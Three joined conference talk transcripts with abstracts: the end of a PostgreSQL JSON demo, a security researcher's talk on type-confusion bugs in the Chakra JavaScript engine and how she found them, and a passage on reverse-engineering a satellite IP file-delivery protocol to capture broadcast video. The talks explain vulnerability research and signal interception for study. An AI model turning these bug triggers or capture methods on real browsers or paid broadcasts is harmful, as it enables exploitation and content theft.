here now is I use this trigger and let it run instead of an update on that view that we created recently. And so now it's attached. So what I'm able to do now is manipulate data first only visible things. So what I'm going to do here is I'm selecting some data out of the JSON to show it and I change some data with the JSONB set command. So what I have to give here is the field where the data is in and here I'm naming what should be changed and here I write whatever it is. So I can just change data on the fly and replace text inside the JSON. So that was the original the artist name and that is what I've replaced it with. But that's not written in the database it's only inside the result that we see right here now. It's just getting a result where we can change JSON data on the fly. So but now as we know how we could do it we update that JSON data and that query updates the view and with this just name it new, Metallica, had to give it a name. So let's see how it looks like and you see the JSON has changed and the JSON comes through the view directly from the table. So just in case that you don't believe me that is the access to the table and I've written through the view from JSON through the table back. So you're even able to change your JSON data that you created on relational data and put it back into the original tables. That takes some effort of course to write all these thought procedures. I've used the standard language that is usually used that is PGPL SQL but you're also able to lose a lot of other languages. Python is available, JavaScript is available for writing thought procedures or functions in Postgres. So you have a choice what you do. And recently we have changed our data with the function that we see up here again where... So here I used the data, the JSONB set to replace that inside but there is as I said that we have another one. There is the concatenating operator. The concatenating operator you can reuse it for the same as what we have did with the JSONB set because if there is a change in a key value inside it replaces it, it overwrites it. Everything that's new will be extending the JSON but the changes are just overwritten. So that is what we see here. So it's still the same as in the first example where I have the artist ID, the original value of the JSON, I can do whatever I want and also can give the correct name with the other function. So now we use the concatenation here to write the data back to bring it back to the original name with the other function. So that does work. Also with the concatenation. So the trigger was executed, hopefully. Let's see how it does look like in the JSON data. So here we see we've done it with the concatenation operator. We've done the same thing as we did before with the set operator. As the concatenation operator is much more complex, it takes a little bit longer to manipulate the data. So when it's only changing data, use JSONB set. If you also want to extend data or have changes and extending for a JSON value, then you can use that concatenation operator. So what there also is is that I said previously there is the possibility that I can remove data with the minus operator, which you see here. And it's also not changing the result inside the table or inside the stored JSON. It's just on the fly changing some data and viewing the output. So that is the complete JSON as we had before. And I use JSONB pretty here again so that we are able to read it. Make it a little bit bigger here. So that is still the complete value that we have in the JSON. And as you see here, I can change some data and I can work with that and there is the album is still there, the artist ID is there, but the album is completely removed out of that JSON. And that's so far for the comparison what you can do with relational data and JSON data to turn it upside down front and back around as you like. And it's really fast and easy in the end. What I'm doing now is going to create a table to import the data from this Amazon book reviews. So first I create that table. That's done. It's only one field inside that is that JSONB field. The data is stored in a file formatted as JSON. So I import that data that takes some seconds because well even in 1998 Amazon had several book reviews and that's it. Took seven seconds which is when we have a look for nearly 600,000 records. That's fast enough I think to import it into the database with one query. So I really love copying. So let's see how it does look like. We only take the first record here and here you see the structure is some sort of review state, whatever it is, votes, rating, helpful votes and product stuff inside grouping. There are a lot of fields inside that JSON. So now we just select some data from that JSON. What I'm doing here is I get the product title and get the average review for the rating for the review and to see what the data is about and I do it only by one category. So I have also where inside and for calculating that data from the JSON fields inside this one table having this average stuff worth nearly 250 milliseconds. It's not that slow I think but it's okay for some sort of things for 600,000 records but now let's create that GIN index that also takes obviously some time to create all the paths. It has to pass all all the JSON values inside that table. Takes nearly 20 seconds, usual, but for 600,000 records but you only do it once and then you have access through the index. And now let's see how fast it is now. Eight milliseconds. So that index was worth creating it I think. So you see it takes the index really everywhere. When you take a look at the explain plan you see that he does the index scan right here. Bitmap index scan and adjusts the index and to reduce the data and to aggregate it then afterwards it's just worth creating an index on this JSON stuff. Let's go a little bit on. Get some more data out of it. It takes a little bit longer because that's calculation about over the old data in the database. So there are lots of reviews with books that don't have a category we see here and these one have the most some of the very hard amount of reading. So and here we have the category the average rating and so we can even go over the whole data and queries data doing whatever we want with this JSON. And these kind of things is the reason why MongoDB announced early this year with their release in February I think it was. They announced that they have now an BI tool. So out of the box BI tool with MongoDB. The fun fact is at that time it turned out the BI adapter for MongoDB is Postgres. They created a foreign data wrapper where you can access external data and then you can access your MongoDB data directly from Postgres and do attach every reporting tool that you would like to attach. So what I'm doing here is I'm creating an index on the product category just to show that it is possible. It doesn't help very much because that JSON index usually does that beforehand so it's not faster than it was before. There was a difference when I did that first with 9.4 it turned out that the query was faster after I created the index. In 9.5 I tested it a lot of times and that was really an increase in what Postgres does in 9.5 in performance. So that's it for me about indexes, JSON, Postgres for today. Any questions? Thank you. Yes? Gaibe from University of Dj Grammy Thith of Qualcore. So with this we have Hive. Can I store the JSON on HDFS? And so how this metaphor of SQL and still use code-based? You can. You can do it. There's even a foreign data for Hadoop. I can talk about external data, which is that. I talk about that tomorrow. You can put everything inside there if you need to index it. If you need to access it much often, you can also create what I used here as copy the data inside from that file. What you can also do is you just link them instead of copy them and then create materialized use on top of it. So then you can access the data in a relational way again and still have the other parts as JSON stored away. You only access them when you create then the materialized use. And then you have everything available that you can use for JSON B. All functions, everything. So it gives a lot of opportunities what you can do with JSON data. Any more questions? Thank you very much.
|
A deep walk through PostgreSQL JSON features with data examples. This does include the new and shiny PostgreSQL 9.5 JSON features.
|
10.5446/32380 (DOI)
|
So today I'm going to talk about Shackra, which is the Microsoft Edge scripting engine. There's actually a bit of a backstory to this talk that involves recon because at the last recon I gave a talk on how to find vulnerabilities in Adobe Flash, but I was sort of finishing up my work and trying to figure out what to do next, and someone suggested to me that I look at Shackra, and at that point I didn't even know that Microsoft had open source their JavaScript engine, but I gave it a shot and ended up having a lot of bugs. So today I'm going to talk a bit about what I found and the approach I took to find them. So who am I? I'm Natalie Slavanovich and I'm a security researcher on Google's Project Zero. I'm an ECMAScript enthusiast. I love finding bugs in browsers and Flash and pretty much anything that processes scripts. So what is Edge and what is Shackra? Edge is the new Internet Explorer. It's a Microsoft's new default browser on Windows 10, and Shackra is Edge's open source ECMAScript engine. It's regularly updated, so it's kind of nice. They didn't just, you know, upload the code once and then that was it. You can actually see active development and see the CVEs as they get fixed and that sort of thing, and it accepts external contributions, so you can be the change you want to see in Microsoft Edge. So what is ECMAScript? ECMAScript is the JavaScript standard. It's what developers implement when they try to create an ECMAScript engine, and it is a living standard. There's always new versions coming out. The most recent one was ECMAScript 7, which was released in June. So why does newness matter? Something you realize quite quickly when you look at JavaScript engines is that the standard does not specify implementation. They say what the script needs to do, but not how to implement it so much. So when you're creating a new ECMAScript engine, developers need to make design decisions, and the design decisions are somewhat untested. And sometimes there's trade-offs, there's things like security versus performance, you know, how many checks do you put in. But sometimes there's like other reason things get done, you know, ease of development, that sort of thing. And quite often if you look at some of the older browsers, you can see where the stuff went wrong. You can see, you know, things that got re-ridden, things that they made a concerted effort to get rid of bugs in, you know, some parts, especially WebKit and Firefox, you can see like all the angry comments by developers as they tried to fix a certain part over and over. But you don't have this advantage with a new ECMAScript engine. This is both from the side of, you know, trying to secure it. It's not clear where the weak points are, and also from trying to find bugs. There wasn't as much to start with, because there hadn't been so many bugs found yet. And in general, I'm a tax mature over time. I think this is really kind of the first few people who've looked at Chakra, and I'm sure there'll be many bugs in the future. One thing I was a bit surprised about is I thought that there would be not a lot of bug collisions, because, you know, in a new product there should be a lot of bugs, and they haven't all been found yet. But it turned out that basically like many people converged on the same bugs, and I'm not sure what that happened, why that happened. It may be that they were very obvious bugs, or they were very similar to bugs that were found in other browsers. So, where are my goals? I wanted to find a lot of bugs in Chakra, understand and improve some of the weak areas, or at least drive improvements in those areas, and I was hoping to find deep and unusual bugs, asterisk, because that didn't end up happening. Everyone pretty much found the same set of bugs. And my approach was mostly code review. I find especially, if you're in a situation of wanting to find a lot of bugs and kind of do a comprehensive bug finding, you know, find all the similar bugs so they can be fixed. I'm code review is typically the best. You find quality bugs, and you kind of know their quality upfront, because you know what's causing them. I thought I would find bugs that, you know, maybe live longer and are more likely to be used by attackers. All of that turned out not to be the case. And also I found it easier to fix or get entire classes of bugs fixed. Something I found interesting is I was talking to one of the other people that found a similar bug and used it and put it to own, and he said that, you know, he wasn't even sure, you know, is it used after free? Is it an overflow and that sort of thing? And that's kind of typical of bugs you find through fuzzing. Sometimes it's not always clear what causes them, but if you spend a lot of time looking at the code, you can figure out why they happen and hopefully find like all ten places where that happens. So how do you start? I have my RITFS there. Reading the standard, in my opinion, is really important if you want to find good browser bugs and bugs and script engines. You would be amazed by the stuff that's in there. There's a pretty crazy stuff and a lot of it causes bugs. If you can't bring yourself to read the standard, I'd recommend the Mozilla docs. They're fantabulous. They have, you know, every method, a description of the method, browse or compatibility in a table, and then a link to the ECMAScript standard where you can find more information. You'd think you died and went to ECMAScript documentation heaven, which by the way is where I totally hope I go when I die. Many features are infrequently used and this is the ones that cause bugs. I find like there's almost a trade-off. Like every so often you do find a bug in a really commonly used feature, but most of the bugs are in, you know, stuff that less than one percent of web pages or even way less than that ever use. And the features can be very deeply intertwined. Quite often one thing that turns up in the standard has really deep reaching impacts other places. One example of this is the array.species creator. So the idea here is in JavaScript there's lots of different array methods where it'll copy the results into a new array. For example, slice is just subarray and it will get to indexes and then create a new array and copy your array into it. But then, you know, the problem is let's say the thing I'm slicing is actually a sub class of array and not actually the array. Do I return the new thing as a sub class or just like a regular array? And of course instead of picking one, why don't we make this a configurable property and then you can specify which one you want. And this is of course easily implemented by inserting a call into script into every single native array call. So that's, you know, basically impacts everything you do with an array and makes it vulnerable. This can interact with other design features. For example, I think one of the most important things in design decisions in creating an ECMA engine is how arrays and how objects work. And most of browsers do something like this. This is exactly what Chakra does, which is you start off with like a very small, not complex array and then as you add new features to it, it becomes a more complex object. So in Chakra, you start off, you just have integers in your array and then you're an integer array. As soon as you get a float added to you, you become a float array and that has to be twice as long because there's eight bytes in an array. And then if you add an object to it, it then becomes a var array and that means instead of having numbers in the array, you have pointers to objects. And then the very final stage of an array, which doesn't happen very often, is what if you configure a property to an array? What if you make one element of the array read only? Then you have to actually have a structure with the property of every element in it and that's what they call an ES5 array. And how do they implement this? They actually swap out the vtable. They very literally cast the object to bytes and then change the vtable to be something different. And I found that fairly surprising, but that's what happens. And it has some interesting consequences with regards to bugs. So to give an idea of how this works, you have your inter-array and the way arrays are structured. And this is actually a fairly elegant design. Every array is an array object and then it has a head that points to a segment of the array and then the segment has like where it starts and its data in it and that sort of thing. So another thing to note about this is a lot of browsers have a concept of a sparse array and a dense array and Chakra doesn't really have that. Basically your dense array is just a very, very small sparse array and then if it becomes sparse, they can just add more segments. So if you change the type, let's say you added a float to this, it changes its type, it swaps out the vtable and then it goes down this chain and for every segment it will allocate it so it's now twice the size and put in the things as floats and then move on. So to give an example of how these two things combine to cause bugs, there's this bug which is an array dot filter and there's a similar one in array dot map. So to show how this works in the script engine first, you start off and you want to do this method which basically it runs a function on every item in an array and then if this function you provided returns true, it goes into the new array, otherwise it does not go into that array. So you start off, you have to create the array and realize this is a constructor you provide, it can be anything and then it does the call on every single one and then it calls this direct set item at function and that's kind of where the problem is. This one's actually only defined for the variable arrays and none of the other array types so if you call it it's type confusion and the mistake here is that the developer assumed that when you're creating the new array it would be an object array because that's what by default the constructor does but you can override it and then that will cause type confusion and here's what this looks like in JavaScript. Starting at the bottom you create the array and then you redefine in the middle the species that and that's what returns dummy which is a constructor that actually makes your array. Another property of JavaScript I read about, this is like absolutely wild but you can put interceptors, getters and setters on the index of an array and this has all sorts of interesting impacts like here's how it works. You have your array and then you call object up to find property and you add a getter and a setter to this array and then if you change it it will call this getter and setter and what's even kind of weird is quite often if you use like internal properties of an array like let's say you call array.push on that it will still trigger this access and that can do all sorts of things that the developer wasn't expecting and this gets even more interesting if you look at how objects work in JavaScript. So every object it has its class hierarchy and this is defined by the prototype so you go you start off let's say you're trying to get a property like property one you'll go and I see if it's in the array object if it's not you get the prototype and if it's not there you get the prototypes prototype and you go all the way up the chain until it's null and that's how you get a property. So let's say you define the property of not the array but the prototype object that is given to all arrays then you that also works and then you create these arrays after you've done that and without ever touching the array it will still trigger these M accessors. Now it's not perfect because if you initialize the array like in B it doesn't work but if you are creating an empty array and then putting stuff into it and you can actually intercept this before you've ever touched the array and what's cool about that is if it's done in a native method in the engine quite often you it will call the setter and you can get a handle to that array before it's even been returned to you which can cause bugs. Here's an example of a bug caused by this and also the array typing so it's pretty simple this is array.toString which is also called array.join and you just basically cycles through every element in the array and then converts it to a string so it does this and it tries to get it and this is actually a templated function so it will call in and then it will try and convert the item which can execute script and then that can actually do the thing where it swaps the vtable out and at that point it's too late right? You're in a templated function and it's not going to like go back and change you to have the right template so then everything you do after that is on the wrong type and it's type confusion and here's an example of the code that causes this notice that you're like actually putting the getter and setter on the index so that's the thing that triggers the code that can change the array type. Another interesting JavaScript property is the proxy and this is basically you know what if you know you're not satisfied with using other things to debug JavaScript you want to debug JavaScript in JavaScript. Well then you need to have this function called a proxy and that can intercept everything that you do to an object. I'd encourage you to read the spec for this like it's just it's very so full-featured you know you can make it execute code if you call the constructor if you get a property if you get the property definition there's just a very very large number of things that you can intercept using this method and it causes like a number of problems both in browsers there are also issues in flash due to this basically because this is supported every single operation that handles an object in JavaScript has to you know consider the possibility that the call could be intercepted and you know that's a hard thing to always have on your mind there's always mistakes that are due to not realizing that an object could be a proxy. Here's one that happened in Chakra and one of the interceptors you can get on a proxy is the prototype so when you you know how I showed the proxy chain if you have a or the prototype chain if you have a proxy and that's not true just at one point in the chain you call a method and then that returns the next prototype and this is unfortunate because in Chakra and actually most engines I've looked at they perform a check when setting a prototype you know it can be certain things it can't be certain things and even more sometimes you want to do things to the object to make it perform better as a prototype make it a certain type remove certain optimizations that sort of thing and this doesn't happen if you have a proxy giving back the prototype so in this case this is a function internal fill from array and this is if you for example sort an array you want to get all the objects out of the prototype first before you sort it otherwise what will become more complex so before it calls sort it will use this function to get all the properties of the prototype and put them into the main array before sorting it and this one you can see at the bottom it gets the prototype and it made the assumption that the prototype is of a certain type that it is of our array because normally when you set the prototype of an array it makes sure that it's a var array but in this case and that violates that assumption and it's once again type confusion I'm due to this direct set item at which only works on certain array types which is not guaranteed to be the case and this is the code here I'm just to show how this works you create the proxy with the handler and it has the prototype intercepted at the top another fun feature of JavaScript is new target and this is it's another kind of weird property it can be used for subclassing but you can also just use it I'm using reflect to create any object you want with any prototype you want and it's not that frequently used but what's interesting is they implemented it in Chakra so that if you have new target on a function it's just an extra parameter so they'll push the extra parameter on the stack and then increment it and then have a flag which was great but unfortunately another call also did this for something different so this was a really fun bug basically if you create a proxy which does new target on a val you'll get type confusion because a val can also get a extra arg for another reason I really like this bug because you can tweet it it if you had to put a proxy on a val it's a fairly bad type confusion and this is kind of I'd say also a case of untested code I'm a lot of the other stuff I've showed you is kind of weird JavaScript this is something you absolutely should be able to do if you're going to write your JavaScript in that diviger in JavaScript and I guess just no one ever tried it and then there's this last bug you know not every bug is due to you know weird JavaScript features sometimes mistakes happen and there was this one where this asserted the bottom I think wasn't very much intended to be some sort of hard error but it wasn't so this is just a simple uninitialized variable if you have one two or three args it does the right thing if you have more args it just falls through and doesn't initialize it and this was also wonderfully tweetable very easy bug to reproduce so that's it I think from doing this I learned a lot about how the Macmas script implementation choices lead to bugs there's lots of things in JavaScript that are very unusual and not very well used in webpages and you know can lead to a large number of bugs so it's a you know if you're doing this on yourself learn about these underused features and especially the ones that add into and in execution points and you can I think you'll find a lot more bugs and then I'm gonna end with a bit of a call to join the party a few people haven't working on chakra not very many yet so I'd encourage everyone you know if you thought these bugs are cool you know try your hand at it I bet there's a lot more bugs to be found and that's it I thanks a lot and if anyone has any questions they can ask them
|
Microsoft Chakra is the new JavaScript engine on the block, and the bugs are pouring in. This presentation discusses techniques for finding bugs in a ‘fresh’ ECMAScript engine. When standards are implemented, design decisions are made that can affect security for years to come. This talk describes some of the implementation details of Chakra and how they led to specific bugs, as well as some ideas for finding future bugs. Recommended for people who want to find more or better browser bugs!
|
10.5446/32381 (DOI)
|
All right. My name is Taylor Jacob and I'm here to discuss a satellite-based IP protocol that I reversed engineered a couple years ago. This protocol is used all over North America to distribute news media, video on demand, films to movie theaters, digital signage files amongst other more mundane uses. There are many different protocols that operate on the same principles as what I will discuss today. I can't speak of the prevalence of these same systems or similar systems being used in Europe, but based on the vendor website, I suspect there are similar systems used across the globe and not limited just North and South America. So I need to start with a little bit of background to make sure we're all on the same page. Although there are many types of different satellites circling the Earth, this presentation deals specifically with most commonly known type geostationary satellites. These satellites are well suited for distributing a variety of information from a single source to a large geographic area. There's commonly known uses for TV content, but the setup is also well suited for the other types of media distribution. And there's typically no return path, this sort of delivery network, and that sort of setup is okay. If you're watching TV, it's not important that you tell the station you're watching, and if you're receiving media files, they generally won't be needed within seconds of delivery. Usually they position the data days beforehand. So for this, my hardware setup was pretty basic. I used some standard C-band dishes, which you see there, and a PCI DVBS card and just a Linux x86 PC. And for the software I used, all open source software, I used DVB Snoop, which is a transport stream analyzing tool, the regular DVB tools like SF to tune, DVB traffic to do some in-depth analysis on the transport, or to look at the PIDs on the traffic, and then your standard UNIX tools, greps, or UNIQ and other text-based tools. And then at some point I had to start writing my own software to get deeper into it. So before I dive in, I want to briefly cover some technical aspects of the satellite systems and the video formats. Digital DVB is the most prevalent digital video broadcasting standard in the world. There's three main types. There's DVB-T for terrestrial, DVB-C for cable television, DVBS for satellite. There are newer versions, DVBS-2, T2, and C2. And although the V in DVB would indicate that it's for video, it can also carry any other type of digital content. In the case of this presentation specifically, IP traffic. So the main difference between DVB-T, C, and S is the transmission medium. For T, it's the air. For C, it's the copper cable. And S, it's the earth's atmosphere. The physical interface is generally referred to as a MUX in all three DVB flavors. In the case of DVBS, it's also referred to rather erroneously as a transponder. And once the signals are demodulated into a bit stream, they're virtually identical. And the standard way this data is moved is MPEG transport stream, also called TS for short. Let's see. And the format's relatively simple. It's 188-byte packets that have a simple four-byte header. And all you really need to know for this presentation is it starts with 47 hex. And there's a 13-bit field called the packet identifier. More commonly known as the PID. So on the transport stream, there's 8191 available PIDs. And of all of them, only a fraction will be used simultaneously. Each PID will carry a specific type of a traffic. It can be a single video stream, audio stream, program metadata, or other data traffic. The PRDs are how a set top box or other component can filter out the content not relevant to their operation. For example, a digital video channel will be made up of a few PIDs. Generally you will have one PID used for the video stream, another for the audio track, and potentially others for subtitles or captions or whatever you call it in Europe. That's what we call it in North America. So the set top box would filter those specific PIDs and ignore everything else. And as far as encryption, DVB encryption will run on that 184-byte payload. It's just the generic 0-1 to B7 there in my diagram. And then the second part I need to cover is the packetized elementary stream and PSI data packet and sorry. PES is the format that defines how the elementary stream data, which is generally audio, video is carried in transport stream. The elementary stream is packetized in the sequential order and the PS packets are sent on the PID. The format of the video or audio codec isn't defined and it typically has changed over time. Historically the video would have been MPEG 2. Now it's H264 and it's migrating to HEVC. And the important part of that you need to know about this is packetized elementary stream always starts with a 0-0-1 sequence and hacks. And the other type of payload, PSI is most commonly described, is used to describe the layout of a transport stream, meaning how it's configured, what TV channels are available, what PIDs are available to find the video and audio streams on. But there's many other types of PSI data that allow different standards to write on top of the transport stream to be able to define what is necessary for their application. Now DVB multi-protocol encapsulation standard is the standard that pertains to this presentation. It defines the means to carry IP traffic over the transport stream. The key parts are one or more PIDs can carry DVB MPE traffic and all the PIDs will operate independently of each other. Each PIDs DVB MPE stream may contain more than one destination IP. The intention is to take the IP packets from one PID and put them on an Ethernet network somewhere once they're decoded. In North America I encountered very little unencrypted unit-cast IP traffic, but I did see it here and there. The vast majority of the IP traffic I encountered is multicast UDP since the satellite link is usually single directional. So a little bit of the background. I've always enjoyed scanning satellites for news events, feeds, sports events, etc. And although there's a lot of program that's available for subscription, it's always been fun to see what you aren't supposed to see. When scanning signals with a satellite set top box, you look for these hidden channels. It's common to run into lots that are encrypted. It's also common to find a transponder or transport stream that will leave no programs on. And what you can see here is a set top box doing a blind scan. And so anyway, so these transponders that have no programs that aren't encrypted or anything, they obviously have some purpose, but it's not carrying television traffic. And many times they'll be satellite-based internet services, but not always. So for years I always wondered what they were, but I never did much investigation assuming it was just encrypted internet traffic. But at some point, seven or eight years ago, I saw hints here and there on some forms that they're being TV channels on these unknown transponders. They were calling it IPTV. Unfortunately all these signals were on C-band and I have a C-band dish at the time. So I set out to find a C-band dish and start examining these signals with a Linux PC. I've always had a PC around with a DVBS card, so examining them was just a matter of sitting down and poking around once I managed to find a suitable dish and get it installed. So once I acquired my first C-band dish, I installed it and I started taking notes on these empty transponders. So the process that I would use to examine these empty transponders once I found them with the setup box was to see what PIDs were present. Once I knew what PIDs were present, I'd start identifying them. At first I didn't really know what I was looking for, but if it was unencrypted and not a regular PES stream, I was interested. So one of the tools I used to identify what PIDs were present was DVB traffic. This part of the standard Linux DVB tools, it operates by checking every transport, checking every packet in the transport stream over a second and counting what PIDs are present and the bandwidth. So you can see an output here. The capture on the right is from a regular TV MUX and you can see there's a lot of different PIDs and various bit rates. And the one on the left here is what I'm calling an empty MUX that has one PID that has, you can see, almost 72 megabit of data just sitting there. So once I'd identified one of these PIDs with lots of traffic, I'd start to look at it in DVB Snoop and DVB Snoop will allow you to examine and really find detail whatever content is on a particular PID. So I'd use DVB traffic after I identified the PID. After a quick glance, you can see what kind of traffic is being carried. And yeah, if you look at this example here, I cut out a lot because it would have been 30 screens worth of data. But you can see it's IP traffic and in red you can see the IP in the destination port. So I've definitely got some sort of UDB traffic here. So yeah, in a lot of this process, I mentioned it manually, but eventually I programmed it up because it was kind of boring to just write all this stuff on paper. So let's see. So anyway, DVB Snoop will provide a tremendous amount of detail about almost anything it encounters. And here's a portion of the output. Well that's actually the portion of the output. So anyway, so basically since the output's text, I was able to pipe this stuff through Grap and look at what IPs are present and get other statistics and figure out what basically I was looking for. So sorry, I'm a little lost here. So yeah, at first I wasn't really sure what I was looking for, but the first thing I did was to identify the IPs, the IP addresses that were present. Then I started looking at the traffic on each of the IPs. I realized very quickly that if I didn't encounter unicast traffic, it wasn't very interesting. Multicast was a completely different story. So looking at a UDP dump, looking at a dump of the UDP packets, you can see here that I've highlighted the 47s which are based 188 bytes apart and blue, which I guess you can't see very well. There's a bunch of the PES start sequences, so it's really obvious in this packet that there's some sort of video and there's some sort of transport stream, but how to get it out I didn't really know at the time. So let's see. Yeah, by this point I reached the end of the grappable part of my investigation. So I threw together some very basic code to capture the IP packets and manipulate them. At first this little program just displayed what IPs were present on the PID. Then I started to say that payloads of certain IPs to a file and I had my first results. The first success turned out to be linear TV channels. Linear is an industry standard term to describe real-time television station. These channels were made up of a single MPEG transport stream encapsulated in UDP packets with one channel per multicast IP. Each UDP packet would contain exactly seven transport stream packets. Two transponders on the same satellite had a large line of encrypted channels, but a few more were in the clear. One of these happened to be NHL-Centerized. It stayed unencrypted for about two years. So to play these channels back on a computer, I wrote a simple program to capture the UDP packets and re-encapsulate them on a different multicast IP, which I would play back in VLC, which you can see a little screenshot here. So after finding the encapsulated linear video, I still had no clue what the majority of the multicast IPs were. There was one multicast IP on the same transponders, NHL-Centerized, that took up most of the bandwidth of a transponder. So I learned from the linear video that each multicast IP was used for a single program. If you used the same technique of saving the UDP packets to a payload on the unknown IP and tried to play them back, every now and then VLC would attempt to render a picture or start to play a short sample of audio. And you can see an example here of how it would kind of start to render something, but you wouldn't really get anything. And I found examples of this type of behavior on numerous satellites. If you examine the UDP payload, you'd see all the telltale signs of the MPEG transport stream in PS packets, but I couldn't figure out how to extract them. So upon closer examination, it was clear the UDP payloads had some sort of header on them. So I read some software to strip some number of bytes and save the UDP payload. Using the same grep technique, it wasn't difficult to determine what was the header and what was the payload. I tried this blind header stripping technique on numerous transponders without much luck until I tried it on a KU transponder that I had tucked away in my notes. On this transponder, I got lucky and managed to get some playable video. So I was excited to finally get video to play without air. It turned out to be an episode of Dr. Oz. American Daytime Program wasn't exactly the most rewarding prize, but it was progress nonetheless. I still wasn't sure why my previous attempts at header stripping had not worked yet on the other transponders. So by this point, I determined the header in the packet for a fixed size with a few exceptions. I started looking at the header more specifically to see if I could understand why I had not always been able to get some sort of video to play. Much like before, I used DVB Snoop and grep to examine just the UDP packet headers in real time. Looking at the side, you can see almost immediately that the headers have some sort of 32-bit field that is interleaved in red, and a separate 32-bit counter in blue, and the number would increment in each packet. I don't know if you guys can see the blue that well, but anyway. So I started to look at the different transponders in my notes, and I realized that I wasn't dealing with the same protocol, or at least the same version of the protocol. And I identified at least five different systems that are all almost identical in design, very similar on a technical level, but differed nonetheless. I started to focus my efforts on the high bandwidth C-band transponder that carried NHL centerisers. I thought it might yield the most interesting results. From here on out, I mainly focused my effort on this transponder and the unknown protocol it was using. So going back to the side, you can see almost all the packets start with 2 bytes, 0, 0, 1. And I started to speculate that the interleaved 32-bit field in the header was some sort of transmission ID. So I wrote some test code to start saving each transmission ID to a unique file. And with this basic change, I was able to run your video from a much larger percentage of the files, and it became clear why my header stripping previously was so hit or miss was that multiple videos were being sent at the same time. So I examined the files that I couldn't play, and I looked at the packet headers for clues. Almost all the transmissions are sent in a sequential order based on that counter, but in the examples I couldn't play, the counter wasn't in sequential order. So I realized that the counter was actually a block number in the transfer, and started saving the payload using the counter as a block as an offset. This cleaned up almost all the errors I was getting, and I was able to play back almost every file. So once I was able to play, the majority of the files being transferred. I also noticed the running time of the videos were significantly longer than the time it took to download. It was only then that I realized the files were meant for playback in the future, i.e., a content delivery system. So being able to save the media files was a great achievement, but it left a lot to be desired. Every file was saved as a 32-bit number, and the only indication as to what content was required further examination, which usually was me trying to play the file in a media player. So I'd also received the files numerous times, and I had no knowledge that it was a retransmission. I also noticed for the first time at the end of these files, the end of these files always contained some seemingly random data. I had a hunch it was some sort of error correction data, but I had no way of proving it at the time. Seeing the split between the file and this extra data was pretty obvious. The random data always started on a packet boundary. So I knew there were other packets in the stream that I was ignoring, and I assumed they had to have some sort of control packets. The receiving stations had to be aware of the files, and know when the transmission started or ended. I started logging all of the non-payload packets to a file. It didn't take very long to get a basic understanding of the other types. All the packets had the same 8-byte header at a 16-bit packet type, a 16-bit packet length, and the 32-bit object field. After this, all the packets differed, but since all the packets used the same object ID field, I started to look at how other packets correlated with the file I downloaded and see what I could determine. The O3 was the most prevalent packet, and it was the longest of all of them. At a quick glance, you could see ASCII strains containing what seemed to be quite obviously filenames. I'll come back to this in a minute. The other two packets were the O6 and the FF, and they only occurred before and after transmission. Their bodies were really short, and it was soon clear that they were used to indicate when a new object ID was starting in the stream or when it was being removed. So the O3 packet, like I said, I come back to, this is the one I was looking for. It clearly contained the filename along with some other descriptive information about the file. So I started logging as many of these as I could and looking for patterns. The process I used was pretty rudimentary. I used VIM and looked at packets side-by-side. I piped and grept packets with various filters to see what pattern I could discern. The first problem was the location of the ASCII filename was not at a fixed offset into the packet. This money had to look more into how the packet was structured to be able to programmatically extract the filename. So my goal was to try to identify as many parts of the O3 packet as possible so that I could see what remained. I assumed the packet was made up of little Indian 32-bit and ultramarated strings since there were a lot of zeros. I knew the total payload size, including the extra data, had a good idea of the file size with a few hundred bytes when the extra data was removed. I also knew the transmission block size. I was able to clearly see the filename in the packet as well. So I found a date field that was usually within the past week or so in Unix time stamp format. So I may be showing my age here a little bit, but I printed out hex dumps of a couple O3 packets for all these properties. I may be showing my age, but I printed out hex dumps of a couple O3 packets for files I knew all these properties of and highlighted them. So once I marked off all these areas, it was obvious that the fields I was interested were all clustered together. You may not be able to see it clearly here in the photo, but there was always a 32-bit little Indian O2 right above the transmission block size, which is highlighted in yellow on there. It was followed by a 32-bit little Indian link that correlated with 13 bytes after the filename, which was usually the end of the packet. Based on this knowledge and a little bit more human pattern recognition, I was able to make a parser that was token-based starting 24 bytes into the packet. Now this had some major flaws, and it would crash fairly often, as I didn't know nearly enough about the format. But regardless, I was able to properly save the files with the correct filenames. I had some bounds checking in my parser to stop seg-faulting, and I logged the errors. And whenever I would miss parse an O3 packet, I would compare the packet that crashed to what I was expecting. And this process continued on and off for a year or two, until the parser stopped running into errors. I'm sure my parser routine isn't a fact similarly to the real software, but it's been stable for four to five years now. So the two big problems at this point were dealing with the volume and the speed of the transmissions. The big video and demand system had two transponders that combined with a constant 150 megabit stream. I could fill up a two terabyte hard drive in less than two days. And most of the content I was collecting, I had little or no interest in watching, but I was able to filter out some of the content based on filenames. It wasn't an ideal solution and required me to manually clean up the hard drives every few days. But over the course of a month, over the course of a month, I set up a 10 terabyte array of two terabyte drives. I never fully addressed the file volume of the file problem programmatically, but with some string matching, I was able to reject a large enough portion I could sort through the files once a month or so. The overall bit rate was the most difficult problem to tackle. This was by far the most I-O bound application I'd ever worked with. The transmissions were constant, so I needed to be able to write data at least as fast as a bit rate because no amount of buffering would help. The 10 terabyte array was more than adequate to keep up with data rate if I totally left it alone, but when doing other operations on the disk, I've run into problems. So the first thing I tried to deal with was to increase the buffering on the DVB driver. I tried using a buffer as big as 64 megabytes, but that only covered about seven seconds. The value I'd been using before was 4 to 8 megs, so it was an improvement, but it alone didn't eliminate the problem. I can't quantitatively say how much it helped, but I still ran into problems very consistently. So from watching the hard drive light, it was clear the data that was being written to disks in quick spurts of a second, and then a pause for a few seconds. I started to look at the disk using VM stat, and you could also see the burstyness. You can see that here in the slide on the top, the blocks out field there and red. You can see it's writing nothing and then writing 45,144 and then nothing. I'll explain in a second. So I did some research and found the kernel settings, the control how much I know data is cached in memory until it's flushed to disk. There's a pair of settings in the kernel, VM dirty background bytes and VM dirty background ratio. And what these settings do, what this setting does is either it sets a byte limit or a ratio to the amount of data being held in iNodeCache before flushing it to disk. The box I was using had 8 gigs of RAM in the default setting. For the kernel, what I was using was 10%. This box wasn't using that much RAM for applications. To be conservative, 4 gigs were being used in iNodeCache. If 4 gigs were being used for iNodeCaching, a write wouldn't get flushed to disk until approximately 400 megs needed to be flushed. 150 megabytes, a rough estimate would take around 20 seconds to add 400 megs to the buffer. The problem was the buffers would still be filling while the data was written out, so that's why the bursts were so much closely spaced. The real problem can be seen in the upper VM stats WA field. This is the percentage of time that the IO operations are suspended and where buffer underends could occur if everything in my application had to stop and wait. So basically that means that everything's waiting for that IO to happen. The last row right there with the yellow, so 17% of that one second, everything is just paused. So to stop this behavior, I changed the VMDirtyBackgroundRatiobytes to zero, which meant that the data was written to disk as soon as it expired. This immediately changed the disk access behavior to be much smoother and data was written out as it was received continuously instead of being so bursty. It also meant 